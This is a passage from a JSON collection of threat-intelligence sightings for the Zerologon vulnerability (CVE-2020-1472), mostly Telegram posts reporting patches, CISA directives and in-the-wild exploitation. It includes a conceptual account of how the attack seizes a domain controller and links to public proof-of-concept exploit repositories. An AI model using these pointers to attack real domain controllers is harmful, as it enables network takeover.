\u0414\u043b\u044f \u044d\u0442\u0438\u0445 \u0446\u0435\u043b\u0435\u0439 \u0432 MS WIndows \u0435\u0441\u0442\u044c \u0441\u043b\u0443\u0436\u0431\u0430 Netlogon, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u0437\u0430\u0431\u0438\u0440\u0430\u0435\u0442 \u0443\u0447\u0451\u0442\u043d\u044b\u0435 \u0434\u0430\u043d\u043d\u044b\u0435, \u0432\u0432\u0435\u0434\u0451\u043d\u043d\u044b\u0435 \u043d\u0430 \u043a\u043e\u043d\u043a\u0440\u0435\u0442\u043d\u043e\u0439 \u043c\u0430\u0448\u0438\u043d\u043a\u0435, \u0434\u043e\u043d\u043e\u0441\u0438\u0442 \u0438\u0445 \u043f\u043e \u0448\u0438\u0444\u0440\u043e\u0432\u0430\u043d\u043d\u043e\u043c\u0443 \u043a\u0430\u043d\u0430\u043b\u0443 \u0434\u043e \u043a\u043e\u043d\u0442\u0440\u043e\u043b\u043b\u0435\u0440\u0430 \u0434\u043e\u043c\u0435\u043d\u0430, \u0430 \u043f\u043e\u0441\u043b\u0435 \u043f\u0440\u043e\u0432\u0435\u0440\u043a\u0438 \u0432\u043e\u0437\u0432\u0440\u0430\u0449\u0430\u0435\u0442 \u043f\u043e \u0442\u043e\u043c\u0443 \u0436\u0435 \u043a\u0430\u043d\u0430\u043b\u0443 \u043f\u0440\u0430\u0432\u0430 \u0434\u043e\u0441\u0442\u0443\u043f\u0430, \u0432\u044b\u0434\u0430\u043d\u043d\u044b\u0435 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044e.\n\n\u0410 \u0442\u0443\u0442 \u043d\u0430\u0441 \u043f\u043e\u0434\u0436\u0438\u0434\u0430\u0435\u0442 \u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u044c! \u0418 \u0441\u043e\u0431\u0441\u0442\u0432\u0435\u043d\u043d\u043e \u0438\u043d\u0444\u043e\u043f\u043e\u0432\u043e\u0434 \u0432\u0441\u043f\u043e\u043c\u043d\u0438\u0442\u044c \u043f\u0440\u043e AD. \u0412 \u0430\u0432\u0433\u0443\u0441\u0442\u0435 Microsoft \u0432\u044b\u043a\u0430\u0442\u0438\u043b\u0438 \u0437\u0430\u043f\u043b\u0430\u0442\u043a\u0443 \u0434\u043b\u044f \u043d\u043e\u0432\u043e\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438, \u0438\u0437\u0432\u0435\u0441\u0442\u043d\u043e\u0439 \u043a\u0430\u043a Zerologon (CVE-2020-1472). 
\u0423\u0440\u043e\u0432\u0435\u043d\u044c \u043a\u043e\u0448\u043c\u0430\u0440\u043d\u043e\u0441\u0442\u0438 \u0443 \u044d\u0442\u043e\u0439 \u0434\u044b\u0440\u044b \u0431\u044b\u043b \u043e\u0446\u0435\u043d\u0451\u043d \u043d\u0430 \u0432\u0441\u0435 10 \u0443\u0436\u0430\u0441\u043e\u0432 \u043f\u0430\u0440\u0430\u043d\u043e\u0438\u043a\u0430 \u0438\u0437 10. \n\n\u0421\u0430\u043c\u0430 \u0438\u0434\u0435\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u043a\u0440\u043e\u0435\u0442\u0441\u044f \u0432 \u0435\u0451 \u043d\u0430\u0437\u0432\u0430\u043d\u0438\u0438 \u2014 \u0441\u043f\u0430\u0441\u0438\u0431\u043e \u0432\u0441\u0435\u043c \u0446\u0435\u043d\u0438\u0442\u0435\u043b\u044f\u043c \u043a\u0430\u043b\u0430\u043c\u0431\u0443\u0440\u043e\u0432. \u0414\u0435\u043b\u043e \u0432 \u0442\u043e\u043c, \u0447\u0442\u043e \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a \u043c\u043e\u0436\u0435\u0442 \u0438\u043d\u0438\u0446\u0438\u0438\u0440\u043e\u0432\u0430\u0442\u044c \u0441\u043e\u0435\u0434\u0438\u043d\u0435\u043d\u0438\u0435 \u043f\u043e Netlogon`\u0443 \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e \u043e\u043f\u0440\u0435\u0434\u0435\u043b\u0451\u043d\u043d\u043e\u0439 \u043f\u043e\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u044c\u043d\u043e\u0441\u0442\u0438 \u0441\u0438\u043c\u0432\u043e\u043b\u043e\u0432, \u043d\u0430\u0447\u0438\u043d\u0430\u044e\u0449\u0435\u0439\u0441\u044f \u0441 \u043d\u0443\u043b\u0435\u0439. 
\u042d\u0442\u0430 \u043d\u0435\u043e\u0447\u0435\u0432\u0438\u0434\u043d\u0430\u044f \u0445\u0438\u0442\u0440\u043e\u0441\u0442\u044c \u0441\u043e\u0431\u044a\u0451\u0442 \u0441 \u0442\u043e\u043b\u043a\u0443 \u043a\u043e\u043d\u0442\u0440\u043e\u043b\u043b\u0435\u0440 \u0434\u043e\u043c\u0435\u043d\u0430, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u043d\u0430\u0434\u0435\u043b\u0438\u0442 \u0430\u0442\u0430\u043a\u0443\u044e\u0449\u0435\u0433\u043e \u043f\u0440\u0430\u0432\u0430\u043c\u0438 \u043f\u0440\u0438\u0432\u0435\u043b\u0438\u0433\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u043e\u0433\u043e \u0430\u043a\u043a\u0430\u0443\u043d\u0442\u0430 SYSTEM \u0438 \u0440\u0430\u0437\u0440\u0435\u0448\u0438\u0442 \u0441\u0431\u0438\u0432\u0430\u0442\u044c \u043f\u0430\u0440\u043e\u043b\u0438 \u043d\u0430 \u0430\u0434\u043c\u0438\u043d\u0441\u043a\u0438\u0445 \u0443\u0447\u0451\u0442\u043a\u0430\u0445.\n\n\u041d\u0430\u0438\u0432\u043d\u043e \u043e\u0436\u0438\u0434\u0430\u043b\u043e\u0441\u044c, \u0447\u0442\u043e \u0437\u0430\u043f\u043b\u0430\u0442\u043a\u0443 \u043e\u0442 \u043c\u0435\u043b\u043a\u043e\u043c\u044f\u0433\u043a\u0438\u0445 \u0431\u044b\u0441\u0442\u0440\u043e-\u0440\u0435\u0448\u0438\u0442\u0435\u043b\u044c\u043d\u043e \u043f\u043e\u0441\u0442\u0430\u0432\u044f\u0442 \u0432\u0441\u0435 \u0438 \u0441\u0440\u0430\u0437\u0443. \u041d\u043e \u043e\u043a\u0430\u0437\u0430\u043b\u043e\u0441\u044c, \u0447\u0442\u043e \u044d\u0442\u043e \u043d\u0435 \u0442\u0430\u043a. Microsoft \u0431\u044a\u0451\u0442 \u0442\u0440\u0435\u0432\u043e\u0433\u0443. \u0417\u0430\u043f\u043b\u0430\u0442\u043a\u0438 \u043f\u043e\u0441\u0442\u0430\u0432\u0438\u043b\u0438 \u0434\u0430\u043b\u0435\u043a\u043e \u043d\u0435 \u0432\u0441\u0435. 
\u041d\u0435\u0432\u0435\u0440\u043e\u044f\u0442\u043d\u043e, \u043d\u043e \u0444\u0430\u043a\u0442!\n\n\u041a\u0441\u0442\u0430\u0442\u0438, \u043d\u044b\u043d\u0435\u0448\u043d\u044f\u044f \u0437\u0430\u043f\u043b\u0430\u0442\u043a\u0430 \u043e\u0442 CVE-2020-1472 \u2014 \u044d\u0442\u043e \u0438\u043c\u0435\u043d\u043d\u043e \u043a\u043e\u0441\u0442\u044b\u043b\u044c, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u0431\u043b\u043e\u043a\u0438\u0440\u0443\u0435\u0442 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435 \u043a\u043e\u043d\u043a\u0440\u0435\u0442\u043d\u043e\u0439 \u0440\u0435\u0430\u043b\u0438\u0437\u0430\u0446\u0438\u0438 \u0430\u0442\u0430\u043a\u0438. \u041f\u0440\u0438 \u044d\u0442\u043e\u043c, \u043e\u043d \u0434\u043e\u043f\u0443\u0441\u043a\u0430\u0435\u0442 \u043f\u043e\u0434\u043a\u043b\u044e\u0447\u0435\u043d\u0438\u0435 \u043a \u043a\u043e\u043d\u0442\u0440\u043e\u043b\u043b\u0435\u0440\u0443 \u0434\u043e\u043c\u0435\u043d\u0430 \u043c\u0430\u0448\u0438\u043d\u043e\u043a \u0441\u043e \u0441\u0442\u0430\u0440\u044b\u043c\u0438 (legacy) \u0441\u0438\u0441\u0442\u0435\u043c\u0430\u043c\u0438. 
\u041e\u0434\u043d\u0430\u043a\u043e \u0432 \u0436\u0443\u0440\u043d\u0430\u043b\u0430\u0445 \u0430\u0443\u0434\u0438\u0442\u0430 \u043f\u043e\u0434\u043a\u043b\u044e\u0447\u0435\u043d\u0438\u0439 \u043d\u0430 \u043a\u043e\u043d\u0442\u0440\u043e\u043b\u043b\u0435\u0440\u0430\u0445 \u044d\u0442\u0438 \u043d\u0435\u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u044b\u0435 \u0441\u043e\u0435\u0434\u0438\u043d\u0435\u043d\u0438\u044f \u0444\u0438\u043a\u0441\u0438\u0440\u0443\u044e\u0442\u0441\u044f \u0438 \u0443\u0447\u0438\u0442\u044b\u0432\u0430\u044e\u0442\u0441\u044f.\n\n\u041a 9 \u0444\u0435\u0432\u0440\u0430\u043b\u044f 2021 \u0433\u043e\u0434\u0430 Microsoft \u043f\u0440\u043e\u0432\u0435\u0434\u0435\u0442 \u0440\u0430\u0437\u044a\u044f\u0441\u043d\u0438\u0442\u0435\u043b\u044c\u043d\u043e-\u043a\u0430\u0440\u0430\u0442\u0435\u043b\u044c\u043d\u0443\u044e \u0431\u0435\u0441\u0435\u0434\u0443 \u043e \u043d\u0435\u043e\u0431\u0445\u043e\u0434\u0438\u043c\u043e\u0441\u0442\u0438 \u0443\u0441\u0442\u0430\u043d\u0430\u0432\u043b\u0438\u0432\u0430\u0442\u044c \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u044f \u0438 \u043f\u0430\u0442\u0447\u0438 \u0432\u044b\u043f\u0443\u0441\u0442\u0438\u0442 \u043f\u043e\u043b\u043d\u0443\u044e \u0432\u0435\u0440\u0441\u0438\u044e \u043f\u0430\u0442\u0447\u0430 \u0434\u043b\u044f \u0437\u0430\u0449\u0438\u0442\u044b \u043e\u0442 Zerologon, \u0432 \u043a\u043e\u0442\u043e\u0440\u043e\u043c, \u043a\u0440\u043e\u043c\u0435 \u0432\u0441\u0435\u0433\u043e \u043f\u0440\u043e\u0447\u0435\u0433\u043e, \u0431\u0443\u0434\u0435\u0442 \u0432\u043e\u043e\u0431\u0449\u0435 \u0437\u0430\u043f\u0440\u0435\u0449\u0435\u043d\u043e \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435 \u0441\u0442\u0430\u0440\u044b\u0445 \u0432\u0435\u0440\u0441\u0438\u0439 \u0441\u043b\u0443\u0436\u0431\u044b. 
Round!\n\nAnd we need to be ready for that too.\n\nBy the way, if you use only local accounts, this vulnerability is no threat to you. You can treat this article as purely educational.", "creation_timestamp": "2020-11-11T18:40:22.000000Z"}, {"uuid": "9697ee94-1640-4131-953f-58d5156e739a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "seen", "source": "Telegram/0sD_EyHySREvSWLaWKL-XHqTqDduPkHhIy1vEKF4pCPQbv8", "content": "", "creation_timestamp": "2020-10-28T02:58:38.000000Z"}, {"uuid": "0d0f9689-5b2e-4104-99b6-2da3fd86da2f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "seen", "source": "https://t.me/LearnExploit/1583", "content": "CVE-2020-1472 - Netlogon Elevation of Privilege Vulnerability\n\nLink \n\u2014\u2014\u2014\u2014\u2014\u2014\u2067\n0Day.Today\n@LearnExploit\n@Tech_Army", "creation_timestamp": "2024-04-11T19:25:28.000000Z"}, {"uuid": 
"f2be8808-2103-4363-bea0-1f08ef5ad54e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "seen", "source": "https://t.me/cibsecurity/22224", "content": "\u274c Microsoft Implements Windows Zerologon Flaw \u2018Enforcement Mode\u2019 \u274c\n\nStarting Feb. 9, Microsoft will enable Domain Controller \u201cenforcement mode\u201d by default to address CVE-2020-1472.\n\n\ud83d\udcd6 Read\n\nvia \"Threat Post\".", "creation_timestamp": "2021-01-15T23:03:44.000000Z"}, {"uuid": "4fcfd549-165e-4655-8088-7c1664134ab8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "published-proof-of-concept", "source": "Telegram/gkfhdAVwawsafrkGE1Mwgdh3dAEK3lvSqdGyfRbpyGYsUw", "content": "", "creation_timestamp": "2020-09-17T10:56:34.000000Z"}, {"uuid": "4796e17f-15b2-4f33-9996-d801d50c37df", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "seen", "source": "https://t.me/haccking/103150", "content": "#Training\nZeroLogon in Windows Server. 
Exploitation of CVE-2020-1472", "creation_timestamp": "2021-12-23T14:01:44.000000Z"}, {"uuid": "9f8ab2de-4719-4307-8453-26d3287e4545", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "exploited", "source": "https://t.me/haccking/92345", "content": "#Training\nThe Zerologon vulnerability: CVE-2020-1472\nhttps://telegra.ph/Uyazvimost-Zerologon-CVE-2020-1472-10-08", "creation_timestamp": "2020-10-09T12:00:17.000000Z"}, {"uuid": "acf7bc77-d118-49ee-ac3f-71b47f18f98a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "seen", "source": "https://t.me/information_security_channel/40489", "content": "Patch by Tonight: CISA Issues Emergency Directive for Critical Netlogon Flaw\nhttps://www.darkreading.com/vulnerabilities---threats/patch-by-tonight-cisa-issues-emergency-directive-for-critical-netlogon-flaw/d/d-id/1338971?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple\n\nThe directive requires all federal agencies to apply a patch for Windows Netlogon vulnerability CVE-2020-1472 by midnight on Sept. 
21.", "creation_timestamp": "2020-09-21T17:20:38.000000Z"}, {"uuid": "95bf2595-d569-41f5-a8da-8a85b14f7bb3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "exploited", "source": "https://t.me/information_security_channel/40368", "content": "CISA Issues Alert for Microsoft Netlogon Vulnerability\nhttps://www.darkreading.com/vulnerabilities---threats/cisa-issues-alert-for-microsoft-netlogon-vulnerability/d/d-id/1338920?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple\n\nCISA has issued an alert following the discovery of publicly available exploit code for Windows elevation of privilege flaw CVE-2020-1472.", "creation_timestamp": "2020-09-15T20:51:07.000000Z"}, {"uuid": "d7f22154-5cba-4206-a482-a3682d685fb9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "seen", "source": "https://t.me/HackerOne/2732", "content": "Zerologon: Unauthenticated domain controller compromise by subverting Netlogon cryptography (CVE-2020-1472)\n\nhttps://www.secura.com/pathtoimg.php?id=2055", "creation_timestamp": "2020-09-14T17:11:38.000000Z"}, {"uuid": "57eaef41-8ff2-48ea-9a92-85302dd48f1a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "seen", "source": "https://t.me/xakep_ru/9895", "content": "The Zerologon problem poses a threat to some NAS devices made by Qnap\n\nQnap representatives 
warned that the Zerologon vulnerability (CVE-2020-1472), fixed by Microsoft as part of the August \"Patch Tuesday\", may pose a danger to some models of the company's devices.\n\nhttps://xakep.ru/2020/10/22/zerologon-qnap/", "creation_timestamp": "2020-10-22T19:05:11.000000Z"}, {"uuid": "6ebe57ed-21ea-46c5-a15e-b97e44adf3a9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "seen", "source": "https://t.me/canyoupwnme/6577", "content": "CVE-2020-1472 | Netlogon Elevation of Privilege Vulnerability\nhttps://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1472", "creation_timestamp": "2020-08-12T22:06:57.000000Z"}, {"uuid": "6b673542-89a8-490e-bdb9-22841f5cc692", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "published-proof-of-concept", "source": "https://t.me/SHATOOB/2885", "content": "\ud83c\udd94 @SHATOOB\n\n#CyberAttack\n#ZeroLogon\n\n\ud83c\udfa5 How an attacker exploits the ZeroLogon vulnerability 
and gains access to Active Directory\n\n\ud83d\udd3aGet the security patches for this vulnerability from the Microsoft website\n\n\ud83c\udf10 https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1472\n\n\u269c\ufe0f\u269c\ufe0f  Shatoob, a window onto the world of computing \u269c\ufe0f\u269c\ufe0f\n\n\ud83c\udd94 @SHATOOB", "creation_timestamp": "2020-10-16T13:00:48.000000Z"}, {"uuid": "c05f6ad8-286e-42b5-8be2-9a172c7b1355", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "exploited", "source": "https://t.me/SHATOOB/2897", "content": "\ud83c\udd94 @SHATOOB\n\n#ZeroLogon\n\n\ud83d\udd3aThe indifference of McAfee antivirus to ZeroLogon attacks\n\n\ud83d\udd38 A review that was carried out shows that McAfee antivirus is not able to detect ZeroLogon attacks. 
This is while a large number of important government bodies (including some of the organizations targeted in the recent attacks) have been using McAfee antivirus. \n\ud83d\udd38Because McAfee has blocked Iranian IPs, its updates are carried out indirectly. 
The antivirus products' lack of connection to the vendor's Cloud services removes some Protection capabilities such as Online Behavior, which mainly leaves the antivirus unable to detect emerging threats. \n\ud83d\udd38On the other hand, McAfee's standing in reputable global rankings has declined significantly in recent years.\n\ud83d\udd38It is worth noting that, in the reviews carried out, Padvish antivirus has also been able to detect ZeroLogon attacks since 3 Aban.\n\n\ud83d\udd3b McAfee, 76 days after the discovery of the 
ZeroLogon vulnerability (CVE-2020-1472), announced in a notice that from now on it detects the exploit for this vulnerability.\n\n\u269c\ufe0f\u269c\ufe0f  Shatoob, a window onto the world of computing \u269c\ufe0f\u269c\ufe0f\n\n\ud83c\udd94 @SHATOOB", "creation_timestamp": "2020-10-30T17:16:06.000000Z"}, {"uuid": "a4d6b9df-e8fc-4e3f-927a-15a40795039c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "published-proof-of-concept", "source": "https://t.me/canyoupwnme/6629", "content": "CVE-2020-1472\nhttps://github.com/SecuraBV/CVE-2020-1472", "creation_timestamp": "2020-09-13T19:13:40.000000Z"}, {"uuid": "a09a6195-ccf6-4ae6-841a-9db7ce5acaeb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "seen", "source": "https://t.me/haccking/5487", "content": "#Training\nThe Zerologon vulnerability: CVE-2020-1472\nhttps://telegra.ph/Uyazvimost-Zerologon-CVE-2020-1472-10-08", "creation_timestamp": "2020-10-09T14:00:14.000000Z"}, {"uuid": "7dd9ebdb-65ae-4f20-abca-4fe65c306493", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "exploited", "source": "https://t.me/DC8044_Info/877", "content": "Exploitation of 
CVE-2020-1472, aka ZeroLogon, is being detected on honeypots in the wild.\nhttps://doublepulsar.com/in-the-wild-exploitation-of-zerologon-detected-over-the-internet-on-honeypot-f61e2700215b", "creation_timestamp": "2020-09-27T21:38:24.000000Z"}, {"uuid": "e1336b64-d15a-4be5-bd30-c1d1db504b41", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "exploited", "source": "https://t.me/haccking/7070", "content": "#Training\nZeroLogon in Windows Server. Exploitation of CVE-2020-1472", "creation_timestamp": "2021-12-23T15:01:44.000000Z"}, {"uuid": "687e3207-3540-4df2-be93-15f3f52861be", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "exploited", "source": "https://t.me/SecLabNews/8895", "content": "Microsoft has updated its recommendations for fixing the Zerologon vulnerability (CVE-2020-1472), clarifying the sequence of measures that users can implement to protect vulnerable Windows Server machines from attacks 
exploiting this problem.\nMicrosoft has clarified the procedure for fixing the Zerologon vulnerability", "creation_timestamp": "2020-10-06T07:09:51.000000Z"}, {"uuid": "4261ae9c-a42f-4f8d-9348-720e0895da11", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "exploited", "source": "https://t.me/SecLabNews/8962", "content": "According to Microsoft, the Iranian cyber-espionage group MuddyWater (also known as MERCURY, SeedWorm and TEMP.Zagros) has been actively exploiting the ZeroLogon vulnerability (CVE-2020-1472) in its attacks over the past two weeks.
\nIranian hackers are actively exploiting the ZeroLogon vulnerability", "creation_timestamp": "2020-10-06T10:45:01.000000Z"}, {"uuid": "b57c9e01-88b4-48a3-b37e-cc9e6a548d87", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "published-proof-of-concept", "source": "https://t.me/DC8044_Info/902", "content": "A reminder that today at 13:00 Kyiv time TSARKA is holding a highly topical webinar analyzing the much-discussed Zerologon vulnerability (CVE-2020-1472), which allows attackers to gain administrative access to a domain controller and, from there, to the entire network. 
The speaker will be TSARKA expert Danil Tursumbaev (Wilson).\nWebinar contents:\n- block cipher modes of operation;\n- analysis of the Zerologon vulnerability;\n- the danger of the vulnerability being exploited;\n- personal experience of using the vulnerability on a live project.\nhttps://youtu.be/eJ6L8f6Sw_U", "creation_timestamp": "2020-10-01T10:30:32.000000Z"}, {"uuid": "b32fcce4-7898-47e1-9715-c26378fcfd6a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "seen", "source": "https://t.me/Russian_OSINT/875", "content": "\ud83d\ude94 The FBI has published a list of the 30 most popular vulnerabilities of the past 2 years\n\nCVE-2021-26855: It is a Microsoft Exchange Server Remote Code Execution\nCVE-2021-26857: It 
is a Microsoft Exchange Server Remote Code Execution\nCVE-2021-26858: It is a Microsoft Exchange Server Remote Code Execution\nCVE-2021-27065: It is a Microsoft Exchange Server Remote Code Execution\nCVE-2021-22893: It is an Improper Authentication vulnerability that is marked as critical\nCVE-2021-22894: It is a buffer overflow vulnerability that enables an attacker to execute arbitrary code\nCVE-2021-22899: It is a command injection vulnerability that enables an attacker to execute remote code\nCVE-2021-22900: It is an Improper Control of Generation of Code vulnerability\nCVE-2021-27101: It is an Improper Neutralization of Special Elements used in an SQL Command\nCVE-2021-27102: It is an Improper Neutralization of Special Elements used in an OS Command\nCVE-2021-27103: It is a Server-Side Request Forgery (SSRF) vulnerability\nCVE-2021-27104: It is an Improper Neutralization of Special Elements used in an OS Command vulnerability\nCVE-2021-21985: It is an Improper Input Validation vulnerability\nCVE-2018-13379: It is an Improper Limitation of a Pathname to a Restricted Directory (\u2018Path Traversal\u2019)\nCVE-2020-12812: It is an Improper Authentication vulnerability\nCVE-2019-5591: It is a Missing Authentication for Critical Function vulnerability\nCVE-2019-19781: It is an Improper Limitation of a Pathname to a Restricted Directory \nCVE 2019-11510: It is an Improper Limitation of a Pathname to a Restricted Directory\nCVE 2018-13379: It is an Improper Limitation of a Pathname to a Restricted Directory \nCVE 2020-5902: It is an Inclusion of Functionality from Untrusted Control Sphere and Improper Limitation of a Pathname to a Restricted Directory vulnerability \nCVE 2020-15505: It is an Insufficient Information vulnerability\nCVE-2017-11882: It is a Microsoft Office Memory Corruption vulnerability that enables an attacker to execute arbitrary code.\nCVE-2019-11580: It is an Insufficient Information vulnerability\nCVE-2018-7600: It is an Improper Input 
Validation vulnerability\nCVE 2019-18935: It is a Deserialization of Untrusted Data vulnerability\nCVE-2019-0604: It is a Microsoft SharePoint Remote Code Execution Vulnerability\nCVE-2020-0787: It is a Windows Background Intelligent Transfer Service Elevation of Privilege vulnerability\nCVE-2020-1472: It is a Netlogon Elevation of Privilege vulnerability \nCVE-2020-15505: It is an Insufficient Information vulnerability\nCVE-2020-0688: It is a Use of Hard-coded Credentials vulnerability", "creation_timestamp": "2021-07-29T17:59:02.000000Z"}, {"uuid": "f7d15627-945b-4597-a857-708beaa50492", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "exploited", "source": "https://t.me/CyberSecurityTechnologies/1946", "content": "#DFIR\nThe DFIR Report - Ryuk in 5 Hours:\n- Zerologon (CVE-2020-1472) exploited 2 hours after initial execution of Bazar; \n- Cobalt Strike & Bazar for C2; \n- AdFind, Net, Ping, Nltest & PowerShell for Discovery; \n- WMI & RDP for Execution; \n- Ryuk ransomware for Impact.\nhttps://thedfirreport.com/2020/10/18/ryuk-in-5-hours", "creation_timestamp": "2022-11-27T19:23:41.000000Z"}, {"uuid": "acb2baad-6bf5-4afd-aa45-20d24c71e2d2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "published-proof-of-concept", "source": "https://t.me/CyberSecurityTechnologies/2358", "content": "#Analytics\nTop-10 exploited vulnerabilities in July-December 2020:\n1. CVE-2020-0601 - CurveBall CryptoAPI\nhttps://t.me/cybersecuritytechnologies/628\n2. CVE-2019-17026/CVE-2020-0674 - 0-Day Vulnerability in Mozilla Firefox\nhttps://t.me/cybersecuritytechnologies/914\n3. CVE-2020-0796 - Windows SMBv3 LPE exploit\nhttps://t.me/cybersecuritytechnologies/874\n4. CVE-2020-1472 - Microsoft Zerologon\nhttps://t.me/cybersecuritytechnologies/1742\n5. 
CVE-2020-5902/5903 - F5 BigIP TMUI Critical RCE\nhttps://t.me/cybersecuritytechnologies/1378\n6. CVE-2018-10561 - Dasan GPON Router Auth. Bypass\nhttps://t.me/cybersecuritytechnologies/51\n7. CVE-2020-1350 - Exploit SIGRed\nhttps://t.me/cybersecuritytechnologies/1422\n8. CVE-2020-15999 + CVE-2020-17087 = Win Kernel cng.sys buffer overflow 0-Day\nhttps://t.me/cybersecuritytechnologies/1960\nhttps://t.me/cybersecuritytechnologies/2010\n9. CVE-2020-16898 - \"Bad Neighbor\" RCE Vulnerability\nhttps://t.me/cybersecuritytechnologies/1912\n10. CVE-2020-1938 - \"Ghostcat\" Apache Tomcat\nhttps://t.me/cybersecuritytechnologies/705", "creation_timestamp": "2025-01-04T20:00:34.000000Z"}, {"uuid": "4d55db42-61dd-4e68-947c-169e955db3e3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "exploited", "source": "https://t.me/CyberSecurityTechnologies/1742", "content": "#exploit\nCVE-2020-1472: \nNetlogon (MS-NRPC) EoP Vulnerability\nhttps://www.secura.com/blog/zero-logon\n]-> test tool for CVE-2020-1472:\nhttps://github.com/SecuraBV/CVE-2020-1472\n]-> PoC for Zerologon:\nhttps://github.com/dirkjanm/CVE-2020-1472\n]-> Unauth Domain Controller compromise of the computer account password:\nhttps://github.com/blackarrowsec/redteam-research/tree/master/CVE-2020-1472", "creation_timestamp": "2024-10-28T16:04:45.000000Z"}, {"uuid": "e074e92d-d747-4d1c-a3c3-db331f533845", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "published-proof-of-concept", "source": "https://t.me/CyberSecurityTechnologies/8709", "content": "#Blue_Team_Techniques\n1. Testing 